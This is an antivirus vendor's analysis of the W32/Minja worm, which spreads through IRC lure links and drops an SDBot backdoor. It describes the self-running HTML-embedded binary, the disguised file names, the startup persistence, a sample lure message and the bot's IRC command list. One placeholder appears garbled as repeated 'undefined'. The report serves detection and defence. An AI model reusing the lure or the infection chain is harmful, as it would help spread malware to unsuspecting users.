W32/Minja
Analysis
- Detection included in Fortinet Virus Update July
2 2003
Firmware 2.30 AV definition 4.100
Firmware 2.36 AV definition 4.100
Firmware 2.50 AV definition 4.100
- Virus is 32bit with a compressed application size
of 23,110 bytes – the virus may be encoded within
an HTML document packaged within a .ZIP file named
“Mindjail.zip” – the .ZIP contains
these comments –
Im lame, but im not a kiddie heh
=]
- The virus may have been posted as a link in IRC
channels or sent as a message to IRC users in this
format –
<undefinedundefinedundefinedundefinedundefinedundefinedundefinedundefinedundefined> EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://XX.XX.XX.XX:3030/mindjail.zip
In the above message, “undefinedundefinedundefinedundefinedundefinedundefinedundefinedundefinedundefined” represents a string of nine random letters – the hyperlink pointed to an infected computer
- If the .ZIP file is downloaded, it may contain
an HTML encoded file named “mindjail.html”
with a file size of 32,907 bytes – the HTML
file contains a Base64 encoded binary which is decoded
and initiated by script within the HTML file –
the file may be initiated without user interaction
- If mindjail.html is opened, the binary may be written
to the local machine as “javax.sun.base.exe”
– in the bottom of the Internet Explorer browser
pane, the message “Installing components…java.sun.base.exe”
may be visible – text is also displayed in the
browser window with reference to “Mindjail”
as in this excerpt from that display –
MINDJAIL
Eworethom is trapped - in mindjail.... Mindjail is a trap - its a thought that you just cant get out of your head..E-thoms Mindjail is that he cannot escape a mysterious invisible box which he calls "Satans Box".
- When the file “java.sun.base.exe” is
run, it may copy itself as the file “HPSCHED.EXE”
into the Windows\System folder and modify the registry
to load at Windows startup
- The written file is a variant of the remote access
Trojan known as “SDBot”
- The Trojan connects with an IRC channel and awaits
commands from a hacker or group of hackers –
the Trojan can accept the following commands –
Action - Shortcut
about - "ab"
action - "a"
addalias - "aa"
aliases - "al"
c_action - "c_a"
c_join - "c_j"
c_mode - "c_m"
c_nick - "c_n"
c_part - "c_p"
c_privmsg - "c_pm"
c_quit - "c_q"
c_raw - "c_r"
c_rndnick - "c_rn"
clone - "c"
cycle - "cy"
delay - "de"
die - "d"
disconnect - "dc"
dns - "dn"
download - "dl"
execute - "e"
id - "i"
join - "j"
killthread - "k"
log - "lg"
logout - "lo"
mode - "m"
netinfo - "ni"
nick - "n"
nldump - "nld"
open - "o"
part - "pt"
ping - "p"
prefix - "pr"
privmsg - "pm"
quit - "q"
raw - "rw"
reconnect - "r"
redirect - "rd"
remove - "rm"
repeat - "rp"
rndnick - "rn"
server - "se"
spam - "spm"
spy - "sp"
status - "s"
syn - "syn1"
sysinfo - "si"
threads - "t"
udp - "u"
update - "up"
visit - "v"
worm - "worm"